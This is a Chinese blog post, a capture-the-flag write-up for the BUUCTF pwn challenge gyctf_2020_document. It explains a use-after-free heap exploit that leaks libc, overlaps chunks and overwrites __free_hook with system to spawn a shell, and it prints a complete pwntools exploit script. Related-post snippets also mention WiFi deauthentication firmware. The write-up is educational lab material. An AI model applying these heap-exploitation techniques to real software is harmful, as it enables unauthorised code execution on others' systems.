[BUUCTF]PWN——gyctf_2020_document(UAF)

最新推荐文章于 2023-04-12 09:12:15 发布
最新推荐文章于 2023-04-12 09:12:15 发布
阅读量726 收藏 3
点赞数
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/115067726
版权

gyctf_2020_document

  1. 例行检查,64位程序,保护全开
    在这里插入图片描述
  2. 漏洞在free chunk的时候
    在这里插入图片描述
  3. 简单看一下其他几个功能函数
    add()
    在这里插入图片描述
    像我这样的新手,可以申请几个chunk看一下,方便理清楚堆的内部情况,为了方便描述,我就把蓝色的地方叫做chunk0-1,红框中剩余部分叫chunk0-2
    在这里插入图片描述
    show(),根据存放在bss段的0x202060堆指针数组来输出对应的chunk里的值
    在这里插入图片描述
    edit()
    在这里插入图片描述

利用思路

  1. 申请一个chunk,释放掉,在show,由于存在uaf,利用unsortbin来泄露libc

  2. 泄露libc后,由于第一个chunk被释放了,并且edit函数编辑的是chunk+0x10的偏移位置,所以我们再申请两个chunk, 这个时候,我们就可以发现idx为0的头部chunk指向了,idx为3的头部chunk的pre_size位,这时候已经overlap了,所以直接覆盖chunk3指向堆的那个偏移,并且要与free_hook或者malloc_hook的偏移相差0x10

  3. 经过调试发现free_hook周围都是0,覆盖了free_hook为system

  4. 释放chunk1拿到shell

利用过程

  1. 泄露libc
add('1'+'\x00'*7, 'W'+'\x00'*7, 'a'*0x70)#0
add('2'+'\x00'*7, 'w'+'\x00'*7, 'b'*0x70)#1
#gdb.attach(p)

delete(0)
show(0)
libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3c4b20-88

unsortbin 有一个特性,就是如果 usortbin 只有一个 bin ,它的 fd 和 bk 指针会指向同一个地址(unsorted bin 链表的头部),这个地址为 main_arena + 0x58 ,而且 main_arena 又相对 libc 固定偏移 0x3c4b20 ,所以得到这个fd的值,然后减去0x58再减去main_arena相对于libc的固定偏移,即得到libc的基地址。

  1. 构造重叠堆(overlap)
add('/bin/sh\x00', '/bin/sh\x00', 'c'*0x70)#2	
delete(1)
add('/bin/sh\x00', '/bin/sh\x00', 'd'*0x70)#3

在这里插入图片描述
3. 由于edit修改的是chunk+0x10处的地址里的值,所以不能直接指向free_hook,应该指向free_hook距离0x10处的地方,然后修改free_hook为system即可

payload=p64(0)+p64(0x21)+p64(free_hook_addr-0x10)+p64(0x1)+p64(0)+p64(0x51)+p64(0)*8
edit(0,payload)

edit(3,p64(system_addr)+p64(0)*13)

在这里插入图片描述
完整exp

from pwn import *

#p = remote("node3.buuoj.cn", 28968)
p = process("./gyctf_2020_document")

context.log_level = 'debug'

elf = ELF("./gyctf_2020_document")
libc = ELF('./libc-2.23(64).so')

def add(name, sex, content):
    p.recvuntil('Give me your choice : \n')
    p.sendline('1')
    p.recvuntil("input name\n")
    p.send(name)
    p.recvuntil("input sex\n")
    p.send(sex)
    p.recvuntil("input information\n")
    p.send(content)

def delete(index):
    p.recvuntil('Give me your choice : \n')
    p.sendline('4')
    p.recvuntil("Give me your index : \n")
    p.sendline(str(index))

def show(index):
    p.recvuntil('Give me your choice : \n')
    p.sendline('2')
    p.recvuntil("Give me your index : \n")
    p.sendline(str(index))

def edit(index, content):
    p.recvuntil('Give me your choice : \n')
    p.sendline('3')
    p.recvuntil("Give me your index : \n")
    p.sendline(str(index))
    p.recvuntil("Are you sure change sex?\n")
    p.send('N\n')
    p.recvuntil("Now change information\n")
    p.send(content)


add('1'+'\x00'*7, 'W'+'\x00'*7, 'a'*0x70)#0
add('2'+'\x00'*7, 'w'+'\x00'*7, 'b'*0x70)#1
#gdb.attach(p)

delete(0)
show(0)
offset=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3c4b20-0x58
free_hook=libc.symbols['__free_hook']
free_hook_addr=free_hook+offset
system_libc=libc.symbols['system']
system_addr=system_libc+offset

#gdb.attach(p)


add('/bin/sh\x00', '/bin/sh\x00', 'c'*0x70)#2	
delete(1)
add('/bin/sh\x00', '/bin/sh\x00', 'd'*0x70)#3
#gdb.attach(p)

payload=p64(0)+p64(0x21)+p64(free_hook_addr-0x10)+p64(0x1)+p64(0)+p64(0x51)+p64(0)*8
edit(0,payload)
#gdb.attach(p)

edit(3,p64(system_addr)+p64(0)*13)

#gdb.attach(p)
delete(1)

p.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 921
这是我第一次自己做出来的堆题,,????动 没什么特别,,看一看代码 还是一个堆块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针堆块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
gyctf_2020_document(uaf)
m0_51251108的博客
11-14 990
gyctf_2020_document: 保护全开 漏洞分析: delete函数里指针未清零 大致思路: 这题限制了add时chunk的size,为0x8和0x80,edit时只能从+0x10处改0x70个字符 1.先add一个chunk,在add一个chunk,这个chunk里的name填/bin/sh\x00 (这时0x8chunk中存有指向binsh地址的指针了),我们释放第一个chunk,由于0x80大小,释放到unsortbin中,我们show,就能泄露libc 2.我们接下来的目的是控制申请
gyctf_2020_document
m0_57754423的博客
06-29 754
gyctf_2020_document buuoj
[BUUCTF]PWN——gyctf_2020_borrowstack
mcmuyanga的博客
11-17 1444
gyctf_2020_borrowstack 附件 步骤: 例行检查,64位程序,开启NX保护 本地运行一下程序,看看大概的情况 64位ida载入,直接从main函数开始看程序, buf可以溢出0x10字节,只能够覆盖到ret,参数bank在bss段上,所以打算在buf处利用leave指令去劫持栈,让它跳转去bank处,往bank里写入我们的ret2libc的攻击链去获取shell 随便找个leave指令的地址,leave=0x400699 bank在bss段上的地址 设置rdi寄存器的指令地
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
在电子设计自动化(EDA)领域,Verilog HDL是一种广泛使用的硬件描述语言,用于描述数字逻辑系统,包括微处理器、接口电路以及各种嵌入式系统。本教程将深入探讨如何利用Verilog HDL实现脉冲宽度调制(PWM)。...
gyctf_2020_borrowstack
、moddemod
07-08 381
注意上图,因为bss与got表位置比较近,所以要尽可能的抬高栈顶指针即rsp,不然在后续调用其他函数的时候,会因为一些push操作或者sub使得栈顶指针减小覆盖到got中的内容导致无法泄露libc或者使得程序无法正常运行… from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './gyctf_2020_borrowstack' p = process(proc_name) p = r..
BUUCTF-pwn-hitcontraining_uaf(UAF)
半岛铁盒的博客
06-05 305
这道题可以用来当做堆的入门题来做 开了NX 这是堆的菜单;
buuctf hitcontraining_uaf
cainiao78777的博客
04-12 229
会把指针堆块1重新分配给我们,context堆块会把指针堆块0分配给我们(因为我们申请一个堆块实际上是申请两个堆块(一个指针堆块,一个context堆块))程序是先申请一个指针堆块,这个指针堆块的大小为8字节,前四字节存储的是puts函数的指针,后四字节存储的是要申请的堆块内容指针就是相当于这样。3.打印堆块内容,这段代码会把指针堆块的第一个指针来执行函数,如果把第一个指针修改为后门函数指针,就能getshell。2.释放堆块,这个操作,在释放堆块之后,并未把指针置零,所以存在uaf漏洞。
BUUCTF-PWN-pwnable_hacknote-UAF
Rt1Text的博客
07-10 1051
标准的菜单模式canary和NX保护 2.sub_80487D4() 3.sub_80488A5() 利用思路 泄露libc,调用system,执行bin/sh/,获取shellprint note可以打印泄露地址传入该函数的参数是note结构体自身,无法直接传入字符串“\bin\sh”,原来的note_puts(arg0)是对puts(arg0+4)的封装,而现在的system(arg0)中arg0并不指向字符串而指向system的地址,所以这里需要system参数截断,system
[BUUCTF]PWN——hitcontraining_uaf
mcmuyanga的博客
09-07 1617
[BUUCTF]——hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的字符串,发现了/bin/sh,ctrl+x,跟进找到了后面函数,shell_addr=0x8048945 堆的main函数很简单,逻辑很简单,也没什么好说的,直接看菜单的各个选项 add ...
uaf-逻辑题-BUUCTF hacknote
csdn546229768的博客
11-28 328
首先拿到题目是个菜单题,在ida中进行手动识别重命名函数如图: 首先按照程序流程配合程序一起分析add函数如图: 通过上面分析可知,ptr_array是一个全局数组长度为5,然后进入if判断这个“*(&ptr_array + i)”也就是ptr_array[i]那么这就对每个数组里面的内容进行判空,那就是说这个数组里面的数据是否被add过。 然后就是给数组里面每个分配了一个大小为8byte的chunk实际分配是0x10,然后这句“**(&ptr_array + i) = m_puts”实
BUUCTF-----actf_2019_babyheap (UAF)
半岛铁盒的博客
06-15 6200
这道题和之前做的 hitcontraining_uaf 这道题类似 64位程序,没开PIE 并且这里发现了 bin/sh 字符串
BUUCTF-UAF漏洞 pwnable_hacknote
weixin_45441024的博客
05-21 493
BUUCTF-UAF漏洞 pwnable_hacknote 好久不学习pwn了,今天学习突然就开窍了,开心,好像离大神又近了一步 就不静态分析了,直接动态分析 首先创建两个大小为0x80的堆快,结构如图所示,可以看到每个堆块包含了两个部分 然后我们释放这两个堆块,可以看到被存放进了fastbin中 之后我们创建一个payload,0x8个大小的, from pwn import * from LibcSearcher import * def add(size, content): print(
BUUCTF SROP UAF House of Force 修改free_got为system 静态链接
carol2358的博客
07-12 455
ciscn_2019_es_7 ciscn_2019_es_7 贴张表: ip是接下去要干的,sp是这里干完接下来要干的地址(大概XD) 怎么找binsh看我之前这篇: https://blog.csdn.net/carol2358/article/details/105643009 rsi 当然直接调试找也是可以的 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_es_7' loca
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值